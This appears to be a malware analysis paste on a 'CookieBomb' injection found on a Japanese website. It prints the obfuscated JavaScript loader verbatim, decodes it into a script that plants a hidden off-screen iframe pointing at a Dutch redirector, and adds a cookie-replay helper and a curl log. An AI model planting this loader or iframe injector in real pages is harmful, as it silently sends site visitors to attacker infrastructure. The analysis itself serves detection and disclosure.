
CookieBomb check pad

MalwareMustDie Feb 26th, 2014 397 Never
  1. /-- Case Info ---/
  2.  
  3. Case: Cookiebomb
  4. By: @unixfreaxjp
  5. Date: Thu Feb 27 00:43:31 JST 2014
  6.  
  7. /--- compromised landing site (the page carrying the injected loader; devotia.nl/clik.php below is the iframe target it pulls in) ---/
  8.  
  9. http://lily-tokyo.jp/
  10.  
  11. /--- the injected code, as found in the page source (one inline <script> between the 2d3965 marker comments) ---/
  12.  
  13. </div><!--2d3965--><script type="text/javascript" language="javascript">                                                                                                                                                                                                                                                          oirydv="s"+"p"+"l"+"i"+"t";tmzm=window;rwbe=document;shfai="0"+"x";psfn=(5-3-1);try{++(rwbe.body)}catch(imr){ounc=false;try{}catch(imreq){ounc=21;}if(1){orva="17:5d:6c:65:5a:6b:60:66:65:17:67:6b:63:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:67:6b:63:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:67:6b:63:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:5b:5c:6d:66:6b:60:58:25:65:63:26:5a:63:60:62:25:67:5f:67:1e:32:4:1:17:67:6b:63:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:67:6b:63:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:2c:2d:1e:32:4:1:17:67:6b:63:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:2c:2d:67:6f:1e:32:4:1:17:67:6b:63:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:2c:2d:67:6f:1e:32:4:1:17:67:6b:63:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:2c:2d:1e:32:4:1:17:67:6b:63:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:2c:2d:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:67:6b:63:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:67:6b:63:53:1e:17:5a:63:58:6a:6a:34:53:1e:67:6b:63:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:67:6b:63:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:67:6b:63:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:6
6:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17
:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:67:6b:63:27:30:1f:20:32:4:1:74:4:1:74"[oirydv](":");}tmzm=orva;imrzo=[];for(tcees=22-20-2;-tcees+1380!=0;tcees+=1){thtd=tcees;if((0x19==031))imrzo+=String.fromCharCode(eval(shfai+tmzm[1*thtd])+0xa-psfn);}epep=eval;epep(imrzo)}</script><!--/2d3965-->
  14.  
  15. /--- obfuscation design (stage-1 loader pretty-printed; each colon-separated hex token becomes the character code token + 0xa - 1, i.e. token + 9, and the result is passed to eval) ---/
  16.  
// Stage 1: the inline loader from the compromised page, pretty-printed.
// It carries the second stage as a colon-separated list of hex tokens in
// `orva`, decodes it character by character and hands the text to eval().
oirydv = "s" + "p" + "l" + "i" + "t";   // "split", assembled piecewise to defeat naive string matching
tmzm = window;
rwbe = document;
shfai = "0" + "x";                      // "0x" prefix, so eval("0x" + token) parses each token as hex
psfn = (5 - 3 - 1);                     // 1
try {
    // Anti-emulation gate: in a real browser assigning a number to document.body
    // throws, so the catch block below is the live code path. An analysis engine
    // whose document.body accepts any value never reaches the payload.
    ++(rwbe.body)
} catch (imr)
    {
    ounc = false;
    try {} catch (imreq)
               {
           ounc = 21;                   // dead code: the empty try never throws
           }
    if (1) {
        // "...".split(":") -> array of 1380 hex tokens (elided here; see the full listing above)
        orva = "17:5d:6c:65:5a:6b:60:66:65:17:67: […] 30:1f:20:32:4:1:74:4:1:74" [oirydv](":");
           }
    tmzm = orva;
    imrzo = [];                         // starts as an array, but += below coerces it to a string
    for (tcees = 22 - 20 - 2; - tcees + 1380 != 0; tcees += 1) {   // tcees runs 0 .. 1379
        thtd = tcees;
        // 0x19 == 031 is 25 == 25 (octal literal) -- always true in sloppy mode.
        // Character = hex(token) + 0xa - 1 = token + 9: "17" -> 0x17 + 9 = 32 (space),
        // "5d" -> 0x5d + 9 = 102 ('f'), so the decoded text opens with " function ...".
        if ((0x19 == 031)) imrzo += String.fromCharCode(eval(shfai + tmzm[1 * thtd]) + 0xa - psfn);
    }
    epep = eval;
    epep(imrzo)                         // indirect eval of the decoded stage 2 (listed under "executed scripts")
}
  43.  
  44. /--- session (browser request sequence; the clik.php hit is the injected iframe loading, not a user click) ---/
  45.  
  46. #request# GET http://lily-tokyo.jp/
  47. #request# GET http://lily-tokyo.jp/image-1/top.jpg
  48. #request# GET http://devotia.nl/clik.php
  49. #request# GET http://devotia.nl/templates/system/css/error.css
  50. #request# GET http://lily-tokyo.jp/favicon.ico#-moz-resolution=16,16
  51. #request# GET http://lily-tokyo.jp/favicon.ico
  52. #request# GET http://lily-tokyo.jp/
  53.  
  54. /--- executed scripts (the decoded stage 2, exactly what the loader passes to eval) ---/
  55.  
// Stage 2, injector: append a hidden iframe pointing at the redirector URL.
// Called once per visitor per day from the cookie gate at the bottom of this script.
function ptl09() {
    var static = 'ajax';             // unused
    var controller = 'index.php';    // unused
    var ptl = document.createElement('iframe');
    ptl.src = 'http://devotia.nl/clik.php';   // second-stage URL; in the session log it is fetched right after the landing page
    ptl.style.position = 'absolute';
    ptl.style.color = '56';          // no effect on an iframe; filler built from the same "56" constant as the size
    ptl.style.height = '56px';
    ptl.style.width = '56px';
    ptl.style.left = '100056';       // unitless; the evident intent is to park the frame far outside the viewport
    ptl.style.top = '100056';

    // Only inject once per page: create a <p id="ptl"> container via document.write
    // (the script runs inline during parsing) and hang the iframe off it.
    if (!document.getElementById('ptl')) {
        document.write('<p id=\'ptl\' class=\'ptl09\' ></p>');
        document.getElementById('ptl').appendChild(ptl);
    }
}
  73.  
// Stage 2 helper: write a cookie that expires nDays days from now.
// nDays of null or 0 falls back to 1; path is appended only when given.
// The attribute separators (";expires=" then "; path=") are what the analyst
// helper further down reproduces verbatim.
function SetCookie(cookieName, cookieValue, nDays, path) {
    var today = new Date();
    var expire = new Date();
    if (nDays == null || nDays == 0) nDays = 1;
    expire.setTime(today.getTime() + 3600000 * 24 * nDays);   // 3600000 ms = 1 hour; * 24 * nDays = nDays days
    document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
  81.  
// Stage 2 helper: return the unescaped value of cookie `name`, or null if absent.
// Analyst notes: indexOf(name + "=") also matches a longer cookie name that
// ends in `name` (e.g. "xvisited_uq="); and the (!start) branch is dead --
// when start is 0 the cookie string necessarily begins with `name`, and when
// start is -1 the condition is false, so only the start == -1 test matters.
function GetCookie(name) {
    var start = document.cookie.indexOf(name + "=");   // -1 when not present
    var len = start + name.length + 1;                 // index just past "name="
    if ((!start) &&
        (name != document.cookie.substring(0, name.length))) {
        return null;
    }
    if (start == -1) return null;
    var end = document.cookie.indexOf(";", len);       // value runs to the next ";" or to the end
    if (end == -1) end = document.cookie.length;
    return unescape(document.cookie.substring(len, end));   // undo SetCookie's escape()
}
// Stage 2 entry point: fire the injector at most once per visitor per day.
// A browser already carrying visited_uq=55 (loose ==, so the stored string
// "55" matches) gets nothing; otherwise the marker is set for 1 day on "/"
// and the hidden iframe is injected. Practical consequence for analysis:
// reloading from the same browser profile, or replaying with the cookie
// present, will not show the iframe again -- clear visited_uq first.
if (navigator.cookieEnabled) {
    if (GetCookie('visited_uq') == 55) {} else {
        SetCookie('visited_uq', '55', '1', '/');   // nDays passed as the string '1'; it is coerced in the multiplication
        ptl09();
    }
}
  100.  
  101. /---- reproducing the cookie so the iframe target can be fetched outside the browser ---/
  102.  
  103. Source: http://devotia.nl/clik.php
  104.  
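// Analyst helper: rebuild the exact string SetCookie() in the decoded payload
// writes into document.cookie, so the follow-up request to clik.php can be
// replayed outside a browser with the "already visited" marker present.
var cookieName = 'visited_uq';
var cookieValue = '55';
var path = '/';
var nDays = 1;
var today = new Date();
var expire = new Date();
expire.setTime(today.getTime() + 3600000 * 24 * nDays);   // 3600000 ms * 24 * nDays = nDays days from now
var expires = expire.toGMTString();
// Same expression as SetCookie(): this is the document.cookie / Set-Cookie
// form, with the expiry and path attributes attached.
var documentcookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expires + ((path) ? "; path=" + path : "");
// What a browser actually sends back is only the name=value pair: "expires"
// and "path" are storage attributes and never travel in the Cookie request
// header. Use this form for a curl replay; sending documentcookie as the
// Cookie header hands the server extra bogus pairs ("expires=...", "path=/")
// that a real victim would never send and that a filtering redirector could
// key on.
var cookieHeader = cookieName + "=" + escape(cookieValue);
document.write (documentcookie);
document.write ("<br>Cookie: " + cookieHeader);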
  115.        
  116. /---- Cookie Output (document.cookie form; for a replay only the "visited_uq=55" pair belongs in the Cookie request header) ---/
  117.  
  118. visited_uq=55;expires=Thu, 27 Feb 2014 15:36:52 GMT; path=/
  119.  
  120. /--- Cookie Access (curl replay of the iframe request with the cookie and the landing-page Referer set; note the Cookie header below carries the expires/path attributes verbatim, which a browser would not send. The reply is a Joomla-looking Dutch 404 plus a fresh session cookie, so at replay time the redirector was either gone or serving only requests it could not distinguish from a real victim) ---/
  121.  
  122. * About to connect() to devotia.nl port 80 (#0)
  123. *   Trying 82.150.140.70...
  124. * connected
  125. * Connected to devotia.nl (82.150.140.70) port 80 (#0)
  126. > GET /clik.php HTTP/1.1
  127. > User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
  128. > Host: devotia.nl
  129. > Accept:/
  130. > Referer: http://lily-tokyo.jp/
  131. > Cookie: visited_uq=55;expires=Thu, 27 Feb 2014 15:36:52 GMT; path=/
  132. >
  133. < HTTP/1.1 404 Artikel niet gevonden
  134. < Date: Wed, 26 Feb 2014 15:43:43 GMT
  135. < Server: Apache/2.2.0 (Fedora)
  136. < X-Powered-By: PHP/5.3.27
  137. < P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
  138. < Cache-Control: no-cache
  139. < Pragma: no-cache
  140. < Set-Cookie: 9ab012d8cf17e9055073fbb47bff0246=c460997d447e66a2ed5a98526be443aa; path=/
  141. < X-Powered-By: PleskLin
  142. < Connection: close
  143. < Transfer-Encoding: chunked
  144. < Content-Type: text/html; charset=utf-8
  145. <
  146. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  147. <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-nl" lang="nl-nl" dir="ltr">
  148. <head>
  149.         <title>404 - Fout: 404</title>
  150.         <link rel="stylesheet" href="/templates/system/css/error.css" type="text/css" />
  151.         </head>
  152. <body>
  153.         <div class="error">
  154.                 <div id="outline">
  155.                 <div id="errorboxoutline">
  156.                         <div id="errorboxheader">404 - Artikel niet gevonden</div>
  157.                         <div id="errorboxbody">
  158.                         <p><strong>Mogelijk kunt u deze pagina niet bezoeken wegens:</strong></p>
  159.                                 <ol>
  160.                                         <li>een <strong>verouderde bladwijzer/favoriet</strong></li>
  161.                                         <li>een zoekmachine heeft een <strong>verouderde lijst van deze website</strong></li>
  162.                                         <li>een <strong>fout getypt adres</strong></li>
  163.                                         <li>u heeft <strong>geen toegang</strong> tot deze pagina</li>
  164.                                         <li>De gegeven bron is niet gevonden.</li>
  165.                                         <li>Er is een fout opgetreden tijdens het verwerken van uw verzoek.</li>
  166.                                 </ol>
  167.                         <p><strong>Probeer één van de volgende pagina's:</strong></p>
  168.  
  169.                                 <ul>
  170.                                         <li><a href="/index.php" title="Naar de startpagina">Startpagina</a></li>
  171.                                 </ul>
  172.  
  173.                         <p>Als de problemen blijven bestaan, neem dan aub contact op met de systeembeheerder van deze website en rapporteer de onderstaande fout..</p>
  174.                         <div id="techinfo">
  175.                         <p>Artikel niet gevonden</p>
  176.                         <p>
  177.                                                         </p>
  178.                         </div>
  179.                         </div>
  180.                 </div>
  181.                 </div>
  182.         </div>
  183. </body>
  184. </html>
  185. * Closing connection #0
  186. sh-3.2$
  187.  
  188. #MalwareMustDie!!